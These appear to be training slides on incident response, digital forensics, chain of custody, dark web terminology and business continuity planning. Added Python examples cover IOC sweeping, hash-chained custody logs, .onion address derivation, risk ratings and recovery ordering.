• Support is always a plus
• Vendor will update tools for you
• CYA factor can be a plus: a widely used, validated commercial tool is easier
  to defend if the evidence is ever challenged


HDD Acquisition

• Prior methodology was to pull the power and remove the disk; that loses
  everything in memory (and, with full-disk encryption such as BitLocker or
  FileVault, may leave you with a drive you cannot read), so collect memory first
• Drive sizes today often make full-disk imaging and analysis impractical for the
  "novice" investigator; targeted (triage) collection of the artifacts you need
  is often the better first step
• The forensic responder should have the tools and skills to perform acquisition
  properly, including a write blocker and hash verification of every image


Security Intelligence
• Use information from the initial findings to search the enterprise for
  additional compromised hosts.
• Each new piece of information feeds the process until the entire breadth of
  the compromise is revealed.
• Attackers may be advanced, but they generally reuse the same tools and
  techniques; they are human just like the rest of us.
• Indicators such as IP addresses, filenames, checksums, driver names, service
  names, registry entries, etc. can all be used to search the enterprise. Keep a
  baseline of what is normal, or every sweep will drown in hits on legitimate
  software.
Do not assume that one compromised machine is all there is.
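The pivoting loop described above, as an added example that is not part of the original course material: a seed indicator from the first triage is matched against per-host artifacts, every non-baselined artifact on a matching host is promoted to a new indicator, and the sweep repeats until nothing new turns up. The host inventory, artifact shape, known-good baseline, service names and placeholder hashes are all constructed for the example (the IPs are RFC 5737 test addresses); a real run would feed it the output of your collection scripts.

```python
"""Iterative IOC sweep: what is found on one host becomes a search term for the rest."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Indicator:
    kind: str    # "ip", "sha256", "service" or "registry"
    value: str


@dataclass
class HostArtifacts:
    """Assumed shape of what a collection script returns for one host."""
    services: List[Tuple[str, str]]   # (service name, SHA-256 of its binary)
    connections: List[str]            # remote IPv4 addresses from the connection table
    autoruns: List[str]               # Run-key entries


def is_internal(ip: str) -> bool:
    """RFC 1918 check: internal peers are not promoted to attacker infrastructure."""
    a, b = (int(x) for x in ip.split(".")[:2])
    return a == 10 or (a == 192 and b == 168) or (a == 172 and 16 <= b <= 31)


def indicators_of(host: HostArtifacts) -> Set[Indicator]:
    """Flatten a host's artifacts into comparable indicators."""
    found: Set[Indicator] = set()
    for name, digest in host.services:
        found.add(Indicator("service", name))
        found.add(Indicator("sha256", digest))
    found.update(Indicator("ip", ip) for ip in host.connections)
    found.update(Indicator("registry", key) for key in host.autoruns)
    return found


def pivot(host: HostArtifacts, known_good: Set[Indicator]) -> Set[Indicator]:
    """On a confirmed host, everything that is not baselined becomes a new indicator."""
    return {i for i in indicators_of(host)
            if i not in known_good and not (i.kind == "ip" and is_internal(i.value))}


def sweep(hosts: Dict[str, HostArtifacts], seeds: Set[Indicator],
          known_good: Set[Indicator], max_rounds: int = 10):
    """Return ({host: (round found, matching indicators)}, final indicator set)."""
    iocs = set(seeds)
    compromised: Dict[str, Tuple[int, Set[Indicator]]] = {}
    for round_no in range(1, max_rounds + 1):
        new_iocs: Set[Indicator] = set()
        for name, artifacts in hosts.items():
            hits = indicators_of(artifacts) & iocs
            if not hits:
                continue
            compromised.setdefault(name, (round_no, hits))
            new_iocs |= pivot(artifacts, known_good) - iocs
        if not new_iocs:
            break                      # nothing new to search for: the sweep is complete
        iocs |= new_iocs
    return compromised, iocs


# Constructed inventory: placeholder hashes, RFC 5737 test addresses, invented names.
H_SVCHOST = "a" * 64
H_IMPLANT = "b" * 64
RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nsh"

KNOWN_GOOD = {Indicator("service", "wuauserv"), Indicator("sha256", H_SVCHOST)}

HOSTS = {
    "ws01": HostArtifacts([("wuauserv", H_SVCHOST), ("NetSvcHelper", H_IMPLANT)],
                          ["10.0.0.5", "203.0.113.7"], [RUN_KEY]),
    "ws02": HostArtifacts([("wuauserv", H_SVCHOST)], ["10.0.0.5"], []),
    "srv01": HostArtifacts([("wuauserv", H_SVCHOST), ("NetSvcHelper", H_IMPLANT)],
                           ["10.0.0.5", "198.51.100.20"], [RUN_KEY]),
    "ws03": HostArtifacts([("wuauserv", H_SVCHOST)], ["198.51.100.20"], []),
}

SEEDS = {Indicator("ip", "203.0.113.7")}    # the one thing the first triage turned up

if __name__ == "__main__":
    found, final_iocs = sweep(HOSTS, SEEDS, KNOWN_GOOD)
    for host, (rnd, hits) in sorted(found.items(), key=lambda kv: kv[1][0]):
        print(f"round {rnd}: {host} matched {sorted(h.value for h in hits)}")
    print(f"{len(final_iocs)} indicators after pivoting (started with {len(SEEDS)})")
```

With this inventory the seed IP finds only ws01 in round one; the implant's service name, hash and Run key found there expose srv01 in round two, and the second C2 address seen on srv01 exposes ws03 in round three, a host that never talked to the original IP at all. The quality of the known-good baseline decides whether the pivot step finds implants or floods you with every unbaselined agent in the fleet.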


Forensic Responder

If required on-site:
• Requires a trained incident responder at each location to perform
collection
• Usually involves travel to each affected location; does not scale well
• Often delays investigation analysis
• Typical time from first call to initial triage is 8-24 hours (depending on staff
availability and retainer response agreements)
• Your cyber-insurance provider may provide a responder, or have preferred
firms to call upon (and therefore may cover some/all the cost)


Mobile Devices
Mobile device forensics is a specialized subset of the forensics world. If
you are going to allow mobile devices, you should have a plan for how to
safely acquire and analyze them.
• Using an MDM (mobile device management) platform is the best way to ensure
  you can retrieve data from a device and trust its integrity
• If you need to respond to an incident involving a mobile device:
  – Gain physical access to the device if possible
  – Isolate the device as soon as you have it (airplane mode, Faraday bag,
    etc.); a remote wipe or lock from the user, a thief or even your own MDM
    can destroy the evidence, and a shielded device drains its battery
    searching for signal, so keep it charged
  – Capture the device, OS and app baseline (make, model, OS version,
    installed apps)
  – Perform acquisition using appropriate software
  – Analyze device and app artifacts


Legal issues

• Most (almost all) intrusions will never see a courtroom; any really good
  information will be handed over to the appropriate government agency and
  pursued by them.
• Usually only in-house issues (e.g., employee theft) will require extensive
  legal work.
• Collect and document as if it will go to court anyway; chain of custody
  cannot be added after the fact.


Chain of Custody
You should be able to clearly describe how the evidence was found and
handled, and everything that happened to it along the way. The following
need to be documented:
• Where, when, and by whom the evidence was discovered and collected.
• Where, when, and by whom the evidence was handled or examined.
• Who had custody of the evidence, and during what period.
• How it was stored.
• When the evidence changed custody, and how the transfer occurred (include
  shipping/tracking numbers, etc.).
• The cryptographic hash of each image or file, recorded at collection and
  re-verified at every handoff, so that any alteration can be shown or ruled
  out.

(See sample form included with course materials)
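An added example (not the sample form shipped with the course) of recording the items listed above in a form that can also prove it has not been altered: the evidence is hashed once at collection, each custody event is stored as an entry that includes the hash of the previous entry, and two checks re-hash the evidence and re-walk the chain. Every name, time, location, tracking number and the "image" itself are constructed; in practice the bytes hashed would be the acquired image file and times should be recorded in UTC, ISO 8601, as here.

```python
"""Hash-chained chain-of-custody record with evidence-integrity checks."""
from __future__ import annotations

import hashlib
import json
from typing import Dict, List


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class CustodyLog:
    """One evidence item; each custody event is linked to the previous one by hash."""

    GENESIS = "0" * 64

    def __init__(self, evidence_id: str, description: str, evidence: bytes,
                 collected_by: str, where: str, when: str) -> None:
        self.evidence_id = evidence_id
        self.description = description
        self.evidence_hash = sha256_hex(evidence)    # fixed at the moment of collection
        self.entries: List[Dict[str, object]] = []
        self._append("collected", actor=collected_by, custodian=collected_by,
                     where=where, when=when, note=f"sha256={self.evidence_hash}")

    def _append(self, action: str, **fields: str) -> None:
        prev = self.entries[-1]["entry_hash"] if self.entries else self.GENESIS
        entry: Dict[str, object] = {"seq": len(self.entries), "action": action,
                                    "prev_hash": prev, **fields}
        entry["entry_hash"] = sha256_hex(json.dumps(entry, sort_keys=True).encode())
        self.entries.append(entry)

    @property
    def custodian(self) -> str:
        return str(self.entries[-1]["custodian"])

    def examined(self, by: str, where: str, when: str, note: str) -> None:
        self._append("examined", actor=by, custodian=self.custodian,
                     where=where, when=when, note=note)

    def stored(self, where: str, when: str, note: str = "") -> None:
        self._append("stored", actor=self.custodian, custodian=self.custodian,
                     where=where, when=when, note=note)

    def transferred(self, to: str, where: str, when: str, method: str,
                    tracking: str = "") -> None:
        self._append("transferred", actor=self.custodian, custodian=to,
                     where=where, when=when, note=f"{method} {tracking}".strip())

    def verify_evidence(self, evidence: bytes) -> bool:
        """Re-hash the item at every handoff; a mismatch means it changed along the way."""
        return sha256_hex(evidence) == self.evidence_hash

    def verify_log(self) -> bool:
        """Recompute the chain; an edited, inserted or deleted entry breaks every later hash."""
        prev = self.GENESIS
        for seq, entry in enumerate(self.entries):
            body = {k: v for k, v in entry.items() if k != "entry_hash"}
            if body.get("seq") != seq or body.get("prev_hash") != prev:
                return False
            if sha256_hex(json.dumps(body, sort_keys=True).encode()) != entry["entry_hash"]:
                return False
            prev = str(entry["entry_hash"])
        return True


SAMPLE_IMAGE = b"constructed disk image bytes"   # stands in for the real image file


def build_sample_log() -> CustodyLog:
    """Constructed names, times (UTC, ISO 8601) and tracking number."""
    log = CustodyLog("EV-2019-001", "SSD image from ws01", SAMPLE_IMAGE,
                     collected_by="A. Responder", where="Branch 12, desk 4",
                     when="2019-05-01T14:05:00Z")
    log.stored(where="Evidence locker B, HQ", when="2019-05-01T18:30:00Z")
    log.transferred(to="Forensic lab", where="Courier pickup, HQ",
                    when="2019-05-02T09:00:00Z", method="courier", tracking="TRK0000123456")
    log.examined(by="B. Examiner", where="Forensic lab bench 2",
                 when="2019-05-03T10:15:00Z", note="image hash verified before analysis")
    return log


if __name__ == "__main__":
    log = build_sample_log()
    for entry in log.entries:
        print(entry["seq"], entry["action"], entry["custodian"], entry["when"], entry["note"])
    print("log intact:", log.verify_log(), "| evidence intact:", log.verify_evidence(SAMPLE_IMAGE))
```

The hash chain makes silent edits to the record detectable, but it does not stop someone from rebuilding the whole chain from scratch; for that, the printed form still needs signatures from both parties at each transfer, and the evidence hash should be written on it at collection time.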


Incident Response - Management

Additional items to consider:
• Develop "playbooks" for potential events (e.g., malware, ransomware, DDoS, etc.)
• Consider the extremes – false positive vs. extensive breach
• Conference bridge
  – Consider a secured line to avoid eavesdropping
  – External number/off-site, in case the incident affects the voice system
  – Assume the attacker may be reading corporate e-mail and chat; coordinate
    out of band
  – Scheduled, regular status updates
  – Set up the bridge and make the number known in advance
• Managing an in-depth investigation
  – Customer impact – inconvenience, credit monitoring, reputation, litigation
  – Costs – overtime, vendors, remediation
  – Employee fatigue – errors, morale, terminations


Section 6: Dark Web


Topics:
• Overview: Surface Web - Deep Web – Dark Web
• Terminology
• How the Dark Web operates
• Dark Web Live Demo

“The world doesn’t change in front of your eyes, it changes behind your
back.”
- Terry Hayes, I Am Pilgrim


[Figure: Surface Web / Deep Web (not picked up by search engines) / Dark Web (only accessible with Dark Web browser)]


Terminology

Carding - The trafficking of credit card, bank account and other personal
information online, as well as related fraud services. Activities also
encompass procurement of card details and money laundering techniques.

Dox – To publicly identify or publish private information about someone,
typically with malicious intent. Doxxing is when someone's personal or
identifying information is made available on the internet; it frequently
includes home address, phone number, and place of work.


Terminology

Dump - An unauthorized copy of the information contained in the magnetic
stripe of an active credit card, created with the intention of illegally
making a counterfeit card that cybercriminals can use to make purchases.
The value of a dump increases with the amount of associated information
(i.e., track 1 & 2 data, CVV, ZIP code, DoB, mother's maiden name, SSN,
PIN, debit vs. credit, etc.).

Fullz - A term used by credit card hackers and data resellers meaning
full packages of individuals' identifying information. Fullz usually
contain an individual's name, Social Security number, date of birth,
account numbers, and other data.


Terminology

Tor – (The Onion Router) An open-source public project that provides an
anonymous, or at least difficult-to-track, method of communicating on the
internet by relaying traffic through a chain of volunteer-run relays (three
by default), each of which knows only the previous and next hop. The Tor
Browser is used to access public sites anonymously, as well as onion
services ("hidden services") that are reachable only from within the Tor
network.

.onion – The "host suffix" of a hidden service (e.g.,
"zqktlwi4fecvo6ri.onion"). This designates an onion service that is only
reachable using Tor. .onion names are not registered anywhere: the name is
derived from the service's own public key (the 16-character form in the
example is the older v2 scheme, a truncated hash of an RSA key, which the
Tor network stopped supporting in 2021; current v3 names are 56 characters
derived from an Ed25519 key). Because the name is self-authenticating, it
both conceals where the service is hosted and lets a client verify it is
talking to the right service.
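To show why there is no registry behind a .onion name, here is an added example (not code from the Tor Project) that derives a v3 address the way the Tor rendezvous specification defines it: base32 of the 32-byte Ed25519 public key, a 2-byte SHA3-256 checksum and the version byte 0x03, and the reverse check a client can perform on any name it is given. The key is a fixed, constructed 32-byte value standing in for a real public key; Tor generates the real keypair when the service is configured.

```python
"""Derive and validate a v3 .onion name from an Ed25519 public key (Tor rend-spec-v3)."""
import base64
import hashlib
from typing import Optional

ONION_V3_VERSION = b"\x03"


def onion_v3_address(pubkey: bytes) -> str:
    """onion = base32(PUBKEY | CHECKSUM | VERSION) + ".onion"."""
    if len(pubkey) != 32:
        raise ValueError("Ed25519 public keys are 32 bytes")
    checksum = hashlib.sha3_256(b".onion checksum" + pubkey + ONION_V3_VERSION).digest()[:2]
    raw = pubkey + checksum + ONION_V3_VERSION        # 35 bytes -> exactly 56 base32 chars
    return base64.b32encode(raw).decode("ascii").lower() + ".onion"


def decode_onion_v3(address: str) -> Optional[bytes]:
    """Return the public key embedded in a v3 name, or None if the name does not check out."""
    host = address.lower()
    if not host.endswith(".onion"):
        return None
    label = host[: -len(".onion")]
    if len(label) != 56:                               # v2 names (16 chars) fail here
        return None
    try:
        raw = base64.b32decode(label.upper())
    except ValueError:                                 # binascii.Error is a ValueError
        return None
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34:]
    if version != ONION_V3_VERSION:
        return None
    expected = hashlib.sha3_256(b".onion checksum" + pubkey + version).digest()[:2]
    if checksum != expected:
        return None
    return pubkey


def is_valid_v3(address: str) -> bool:
    return decode_onion_v3(address) is not None


# Constructed key: a fixed 32-byte value standing in for a real Ed25519 public key.
SAMPLE_PUBKEY = bytes(range(32))

if __name__ == "__main__":
    addr = onion_v3_address(SAMPLE_PUBKEY)
    print(addr, "valid" if is_valid_v3(addr) else "invalid")
```

Two things fall out of the construction: every v3 name ends in "d" (the low five bits of the version byte), and a single typed-wrong character almost always fails the checksum, so a client never connects to a near-miss of the intended service. Anyone who holds the private key can prove ownership of the name; nobody can claim it without the key.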


Tor
“…is relied upon by journalists, activists and campaigners in the US
and Europe as well as in China, Iran and Syria, to maintain the privacy
of their communications and avoid reprisals from government. To this
end, it receives around 60% of its funding from the US government,
primarily the State Department and the Department of Defense –
which houses the NSA.”
TheGuardian.com


[Figures: how Tor works (image slides). The Tor Project, Inc. is the owner and originator of this content.]


VPN Relay

Using a VPN further protects the anonymity of the user. If the first Tor node is compromised, the IP of Alice’s computer is not disclosed. It may also circumvent some filters.

The Tor Project, Inc. is the source for portions of this content.

Section 7: Business Continuity

Topics:
• Business Impact Analysis (BIA)
• Plan Development
• Pandemic Planning
• Communications
• Training and Testing
• The Declaration

“It wasn’t raining when Noah built the ark.”
- Howard Ruff

Key Phrases

Recovery Time Objective (RTO)
• Defines the maximum tolerable length of time a service can be unavailable.
• Put another way, it is the time between the disaster event and when the service is back on-line.

Recovery Point Objective (RPO)
• Defines the acceptable amount of information that can be lost due to a disaster event.
• Put another way, it is the time between the last data backup and the disaster event.

Key Phrases

Recovery Point Objective vs. Recovery Time Objective

Timeline (past to future):

  Past ----[most recent backup]---- RPO ----[Event]---- RTO ----[service restored]---- Future

• RPO – time between the most recent backup and the event
• RTO – time between the event and when the service was restored

Business Impact Analysis (BIA)

The process of analyzing all business functions and the effect that a disaster may have upon them. The BIA process should:
– Identify critical functions and processes, and the impact on the business if they are lost
– Determine the systems, applications, vendors, etc. needed to perform the business functions
– Identify interdependencies between functions and processes
– Determine outage tolerances and recovery time objectives (How much information can you stand to lose?)
– Document your recovery priorities
– Evaluate recovery capabilities and facilities to determine whether they can support your recovery priorities

Business Impact Analysis (BIA)

Outage Tolerance by Function – Example

Business Function         RTO       RPO       Recovery Priority   24-hour Revenue Loss
Telephone & Voicemail     4 hrs     NA        Critical            <$5K
Personal Computers (PC)   1 day     NA        Critical            $10K
Core                      1 day     No loss   Critical            $50K
Wires                     1 day     No loss   Critical            $25K
Loan processing           3 days    1 day     Critical            $1M
E-mail                    3 days    1 day     Essential           NA
Internet Banking          3 days    No loss   Essential           $50K
Fraud Detection           5 days    1 day     Essential           $100K
ACH                       5 days    No loss   Essential           $50K
Payroll                   5 days    1 day     Essential           NA
Employee directory        10 days   NA        Important           NA

Continuity Risk Analysis

The process by which potential threats to business operations are identified, whether human, natural, or technical. Once the threats have been identified, the probability and severity index for each risk is determined. A rating is assigned based on the probability and impact of the risk on the business. A Risk Analysis should:
– Identify potential threats to the organization.
– Determine the probability of those threats occurring.
– Determine the potential impact (risk) of the threats.
– Recommend controls and safeguards to minimize the impact on the organization.

Continuity Risk Rating Factors

Probability Assessment
 1   Low - Threat exists, occurrence not probable
 5   Medium - Threat exists, occurrence probable, but target unknown
10   High - Threat exists, occurrence probable, and target known

Impact Assessment
 0   No impact or interruption in operations.
 1   Noticeable impact, interruption in operations for up to one calendar day.
 2   Damage to equipment and/or facilities and/or interruption of operations for two to three calendar days.
 3   Major damage to equipment and/or facilities and/or interruption of operations for more than three calendar days.

• Probability x Impact = Weighted Risk Rating (WRR)
• WRR > 15 poses the GREATEST RISK!

Natural Threats - Example

Event                                      Probability   Impact   Weighted Risk Rating
Disease Epidemic                                10          3             30
Earthquake                                       5          2             10
Electrical Storm                                10          1             10
Fire (internal)                                  5          2             10
Flooding (external)                             10          1             10
Flooding (internal)                              5          2             10
Snow and Ice Storm / Blizzard                   10          2             20
Thunderstorm (damaging hail/wind/rain)          10          1             10
Tornado                                          5          3             15

WRR > 15 poses the GREATEST RISK

Technical Threats - Example

Event                                      Probability   Impact   Weighted Risk Rating
Computer Failure (Network / Server)             10          3             30
Computer Failure (other Hardware)               10          3             30
Computer Failure (Software)                     10          3             30
Hazardous Materials Spill                        1          3              3
HVAC Failure                                    10          1             10
Power Failure / Fluctuation                      5          2             10
Radiological / Nuclear Accident                  1          3              3
Telecom Failure                                  5          1              5
Water / Sewer Damage                             5          2             10

WRR > 15 poses the GREATEST RISK

Human Threats - Example

Event                                      Probability   Impact   Weighted Risk Rating
Bomb Threat                                     10          1             10
Computer (human error)                           5          2             10
Criminal Act (against persons)                   5          1              5
Criminal Act (against property)                 10          2             20
Kidnap                                           1          2              2
Riot / Civil Disorder                            1          1              1
Sabotage (by employee)                          10          2             20
Sabotage (by non-employee)                      10          2             20
Terrorist Act (biological / chemical)            1          2              2
Terrorist Act (conventional)                     5          2             10
Work Stoppage                                    5          2             10

WRR > 15 poses the GREATEST RISK
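As an added worked example (not 10-D’s own material), the Probability x Impact = WRR calculation from the Continuity Risk Rating Factors slide is applied below to a subset of the Natural, Technical and Human example events; the scale values, the > 15 threshold and the event scores come from those slides, while the input validation and the ranking order are the example’s own choices.

```python
"""Continuity risk rating (Probability x Impact = WRR) as taught in the slides.

Added example, not a 10-D tool. Scale values and the "> 15" rule are taken
from the Continuity Risk Rating Factors slide; the event list is a subset of
the Natural / Technical / Human example tables.
"""
from dataclasses import dataclass

# Probability scale from the slide (only these three values are defined).
PROBABILITY_SCALE = {
    1: "Low - threat exists, occurrence not probable",
    5: "Medium - threat exists, occurrence probable, but target unknown",
    10: "High - threat exists, occurrence probable, and target known",
}

# Impact scale from the slide (0 to 3, tied to outage length).
IMPACT_SCALE = {
    0: "No impact or interruption in operations",
    1: "Noticeable impact, interruption for up to one calendar day",
    2: "Damage and/or interruption of operations for two to three days",
    3: "Major damage and/or interruption of operations for more than three days",
}

GREATEST_RISK_THRESHOLD = 15  # slide: WRR > 15 poses the greatest risk


def weighted_risk_rating(probability: int, impact: int) -> int:
    """Probability x Impact, rejecting values that are not on the slide's scales.

    Rejecting off-scale values matters in practice: a "probability 7" typed
    into a spreadsheet silently yields ratings the scale never defined.
    """
    if probability not in PROBABILITY_SCALE:
        raise ValueError(f"probability {probability} not in {sorted(PROBABILITY_SCALE)}")
    if impact not in IMPACT_SCALE:
        raise ValueError(f"impact {impact} not in {sorted(IMPACT_SCALE)}")
    return probability * impact


def possible_ratings() -> list[int]:
    """Every WRR the two scales can produce; shows how coarse the threshold is."""
    return sorted({p * i for p in PROBABILITY_SCALE for i in IMPACT_SCALE})


@dataclass(frozen=True)
class RatedThreat:
    category: str
    event: str
    probability: int
    impact: int

    @property
    def wrr(self) -> int:
        return weighted_risk_rating(self.probability, self.impact)

    @property
    def greatest_risk(self) -> bool:
        # Strict "> 15", exactly as the slide states it.
        return self.wrr > GREATEST_RISK_THRESHOLD


def rank_threats(threats: list[RatedThreat]) -> list[RatedThreat]:
    """Highest WRR first; ties broken by impact (longer outage first), then name."""
    return sorted(threats, key=lambda t: (-t.wrr, -t.impact, t.event))


def greatest_risks(threats: list[RatedThreat]) -> list[RatedThreat]:
    """The events a continuity plan must address first under the slide's rule."""
    return [t for t in rank_threats(threats) if t.greatest_risk]


# Subset of the slides' example events (category, event, probability, impact).
EXAMPLE_THREATS = [
    RatedThreat("Natural", "Disease Epidemic", 10, 3),
    RatedThreat("Natural", "Earthquake", 5, 2),
    RatedThreat("Natural", "Snow and Ice Storm / Blizzard", 10, 2),
    RatedThreat("Natural", "Tornado", 5, 3),
    RatedThreat("Technical", "Computer Failure (Network / Server)", 10, 3),
    RatedThreat("Technical", "Hazardous Materials Spill", 1, 3),
    RatedThreat("Technical", "Telecom Failure", 5, 1),
    RatedThreat("Human", "Criminal Act (against property)", 10, 2),
    RatedThreat("Human", "Sabotage (by employee)", 10, 2),
    RatedThreat("Human", "Kidnap", 1, 2),
]


def report(threats: list[RatedThreat]) -> str:
    """Plain-text table in the same column order as the slides, ranked by WRR."""
    lines = [f"{'Event':<40}{'P':>3}{'I':>3}{'WRR':>5}  Greatest risk?"]
    for t in rank_threats(threats):
        flag = "YES" if t.greatest_risk else "no"
        lines.append(f"{t.event:<40}{t.probability:>3}{t.impact:>3}{t.wrr:>5}  {flag}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(EXAMPLE_THREATS))
    print("\nPossible WRR values:", possible_ratings())
```

Because the scales only produce the values 0, 1, 2, 3, 5, 10, 15, 20 and 30, the strict "> 15" rule selects exactly the events rated probability 10 with impact 2 or 3; Tornado (5 x 3 = 15) falls just below it and is not flagged.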


Strategy Development

Three Scenarios to Plan for:
• Your facility is not available/accessible
• Critical systems and/or services are not available
• Personnel, yours or external, are unavailable (snow, ice, pandemic, etc.)

Two Phases to Plan for:
• Response - Immediately following the event
• Recovery - Over the long term

The family of plans (diagram):
• Business Continuity Plans
• IT Disaster Recovery Plan
• Incident Response Plan
• Pandemic Plan
• Communications Plan
• Vendors’ Plans

Business Continuity Plans

• Focused on the continuation of business during abnormal events
• Likely involves alternate processing means
• Departmental or business unit oriented
• The IT Disaster Recovery Plan is a subset of the organization’s overall Business Continuity Plan
• Include:
– Contacts
– Resource needs (people and other) and responsibilities
– Work locations
– References to other documents (e.g., SOPs)

IT Disaster Recovery Plan

• Focused on the restoration and recovery of the organization’s


IT infrastructure
• Include:
– Human and technical resource requirements
– Prioritizations (e.g., Active Directory → Virtual Environment → Core
→ Internet Banking → etc.)
– Declaration procedure and responsibilities
– Process for operating at alternate facility
– Checklists for returning to normal production
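As an added example (not part of the 10-D course materials), the prioritization chain above written as a dependency graph, with a small Python planner that derives the recovery order and checks whether each system's RTO can still be met once the systems it depends on are restored. The system names, dependencies, restore durations, RTO values and the number of recovery teams are all constructed assumptions for illustration.

```python
"""Recovery-order planner for an IT Disaster Recovery Plan.

Added example, not part of the 10-D course materials. It turns the
slide's prioritization chain (Active Directory -> Virtual Environment ->
Core -> Internet Banking) into a dependency graph, derives a recovery
order, and checks whether each system's recovery time objective (RTO)
can still be met once the systems it depends on have been restored.
All system names, dependencies, durations and RTO values below are
constructed for illustration, not taken from any real plan.
"""

# Constructed sample: name -> (depends_on, restore_hours, rto_hours)
SAMPLE_SYSTEMS = {
    "Active Directory":    ((), 2, 4),
    "Virtual Environment": (("Active Directory",), 3, 6),
    "Core":                (("Virtual Environment",), 4, 8),
    "Internet Banking":    (("Core", "Active Directory"), 2, 12),
    "Email":               (("Virtual Environment", "Active Directory"), 1, 24),
}


def recovery_order(systems):
    """Return a restore order in which every dependency precedes its dependents.

    Among systems whose dependencies are all restored, the one with the
    tightest RTO goes first. A cycle (A needs B, B needs A) is a plan that
    can never be executed, so it raises ValueError instead of looping.
    """
    indegree = {name: 0 for name in systems}
    dependents = {name: [] for name in systems}
    for name, (deps, _duration, _rto) in systems.items():
        for dep in deps:
            if dep not in systems:
                raise ValueError(f"{name} depends on unknown system {dep!r}")
            indegree[name] += 1
            dependents[dep].append(name)

    def by_rto(name):
        return systems[name][2]

    ready = sorted((n for n, d in indegree.items() if d == 0), key=by_rto)
    order = []
    while ready:
        current = ready.pop(0)
        order.append(current)
        for nxt in dependents[current]:
            indegree[nxt] -= 1
            if indegree[nxt] == 0:
                ready.append(nxt)
        ready.sort(key=by_rto)
    if len(order) != len(systems):
        raise ValueError("dependency cycle in recovery plan")
    return order


def schedule(systems, teams=1):
    """Project the finish hour of each system given `teams` parallel recovery teams.

    Each system starts once all of its dependencies are restored and a team is
    free. With teams=1 everything is strictly sequential; a larger value shows
    how much (or how little) extra staff shortens the overall recovery.
    """
    team_free = [0] * teams
    finish = {}
    for name in recovery_order(systems):
        deps, duration, _rto = systems[name]
        deps_done = max((finish[d] for d in deps), default=0)
        team = min(range(teams), key=team_free.__getitem__)
        start = max(deps_done, team_free[team])
        finish[name] = start + duration
        team_free[team] = finish[name]
    return finish


def rto_gaps(systems, teams=1):
    """Systems whose projected finish exceeds their RTO: {name: (finish, rto)}."""
    finish = schedule(systems, teams)
    return {n: (finish[n], systems[n][2])
            for n in finish if finish[n] > systems[n][2]}


def dependency_floor(systems):
    """Earliest possible finish per system with unlimited teams (the critical path).

    If a system misses its RTO even here, no amount of staffing fixes it; the
    plan must shorten the chain, restore in parallel or revise the RTO.
    """
    return schedule(systems, teams=len(systems))


if __name__ == "__main__":
    print("Recovery order:", " -> ".join(recovery_order(SAMPLE_SYSTEMS)))
    for teams in (1, 2):
        print(f"{teams} team(s): finish hours {schedule(SAMPLE_SYSTEMS, teams)}")
        print(f"  RTO gaps: {rto_gaps(SAMPLE_SYSTEMS, teams)}")
    print("Critical-path floor:", dependency_floor(SAMPLE_SYSTEMS))
```

In the constructed sample, Core misses its 8-hour RTO at 9 hours with one team, and a second team does not help because the Active Directory → Virtual Environment → Core chain is serial; that is the kind of resource-constraint finding a comprehensive test surfaces and a component test does not.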


Pandemic Plan

• Focus on process for operating with limited staffing
• Don’t limit to specific illness or medical condition
• Don’t hard-link to WHO or CDC declarations
• Test – Day after Thanksgiving, July 5th, snow day, etc.
• “Tag out” people before/during other tests
• Include:
– Contacts, especially medical and governmental
– Shelter-in-place needs (e.g., food, hygiene items, medicines, etc.)
– “Must perform” tasks, and identify areas that can be postponed
– Considerations for “working from home” (i.e., remote access, pay, etc.)


Communications Plan

• Focus on different audiences (customers, Board, employees,
front-line staff, regulators, management, vendors, etc.)
• Don’t plan to say “No comment” – it implies guilt
• Use positive statements (e.g. “We are working to obtain all the
facts. At this time our focus is on our customers, staff…”)
• Methods: Call tree, website, notification service, call-in line, etc.
• Include:
– Contacts – Internal and external (PR, LE, legal team, governmental)
– Clearly indicate who can represent the organization; have backup(s)
– Call tree and/or other methods to contact staff


Vendors’ Plans

• Part of Vendor Management program (incl. in due diligence)
• Know what to expect of your key vendors when they
experience a contingency situation
• Know how the vendor can aid when your organization is the
one experiencing the disruption
• Include:
– Contacts – Especially the ones that can provide priority responses
– How to contact vendors if their normal facilities/contacts are
disrupted


Training and Testing

• Personal safety is first priority – train for it
– Evacuation plans
– Access to a compromised / damaged facility
– Responsibility thresholds (e.g., use fire extinguisher if you can do so without
compromising your own safety)
• Brief is good. Don’t bury employees with the entire plan; train them only
for the areas they specifically need, and make them aware of other areas.
• Exercises, in particular Tabletop Exercises, are excellent training
methods.


Training and Testing

Walk-through exercises
• Participants step through plan document(s); may break into
smaller groups to review task or department specific plans
– Pros: Simple to conduct with little-to-no preparation needed. Useful
for determining document completeness and responsibility
assignments.
– Cons: Usually poor at identifying gaps in planning or in expectations.


Training and Testing

Tabletop exercises
• Facilitated exercise where a specific scenario is presented.
Usually a group discussion, and not a “technical” exercise.
• Participants respond to exercise events, using the
organization’s plans and their business knowledge to respond
to the evolving situation.
– Pros: Excellent at identifying planning gaps. Minimal preparation
time commitment for participants.
– Cons: Facilitator may inadvertently create only scenarios that fit the
organization’s plan(s). Can take significant time for facilitator(s) to
develop the exercise.


Training and Testing

Component testing
• Technical exercise; used to evaluate recoverability of discrete
servers/devices, up to entire “systems” (but not the entire IT
environment)
– Pros: For a technical exercise, it usually presents minimal risk to
production operations, and is relatively simple to schedule/plan.
– Cons: Doesn’t test restoration and interoperation of multiple systems
(e.g., core and Internet banking). Does little to evaluate resource
constraints when multiple “priority” systems are needed concurrently.


Training and Testing

Comprehensive testing
• Technical exercise; used to evaluate recoverability of all
systems needed for the organization’s production operations.
• Should include recovery of systems, and testing that the
applications function and the expected data is accessible.
– Pros: Usually the best test of the organization’s ability to recover from
a major technical disaster.
– Cons: Significant planning effort required. Often results in at least a
temporary increase of risk to regular operations (e.g., staffing or
backup systems are repurposed for the exercise).


Training and Testing

Documentation
• Test plan
– Scope
– Objectives
– Assumptions
– Limitations
• Test scripts and supporting information
(copies of reports, vendor info, timeline, etc.)
• Provide wrap-up report to Board


Tabletop Exercise Development

Tabletop exercise planning

• Determine Participants
• Define Objectives (Including any that are “unstated”)
• Develop Scenario:
– Pick scenario that touches on most or all Goals and Objectives
– Choose major challenges that will be used to drive main scenario narrative
– Create scenario timeline
– Fill in timeline with “noise,” simultaneous events, comms issues, distractions, etc.
– Include challenges for each person/role that will be in exercise
– Plan for the unexpected (e.g., dominant participant, unrealistic responses, etc.)


